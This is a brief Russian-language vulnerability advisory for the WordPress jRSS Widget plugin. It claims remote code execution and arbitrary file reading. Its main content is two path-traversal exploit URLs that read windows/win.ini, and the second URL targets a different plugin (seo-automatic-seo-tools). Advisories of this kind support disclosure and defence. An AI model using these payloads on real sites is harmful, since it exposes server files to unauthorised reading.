Программа: WordPress jRSS Widget Plugin 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Удаленный пользователь может получить содержимое
произвольных файлов на целевой системе.

Эксплоит:

http://localhost/wordpress/wp-content/plugins/jrss-widget/proxy.php?url=../../../../../../../../windows/win.ini

http://localhost/wordpress/wp-content/plugins/seo-automatic-seo-tools/feedcommander/get_download.php?file=../../../../../../../../windows/win.ini



Оставить мнение